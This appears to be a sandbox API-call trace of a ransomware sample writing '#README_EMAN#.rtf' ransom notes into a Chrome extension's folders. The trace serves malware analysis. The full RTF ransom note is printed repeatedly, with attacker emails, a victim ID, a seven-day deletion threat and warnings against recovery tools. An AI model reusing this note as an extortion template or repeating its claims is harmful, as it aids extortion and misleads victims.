460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.165] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.166] CloseHandle (hObject=0x2ec) returned 1 [0291.166] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\#readme_eman#.rtf")) returned 0xffffffff [0291.166] GetLastError () returned 0x2 [0291.166] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 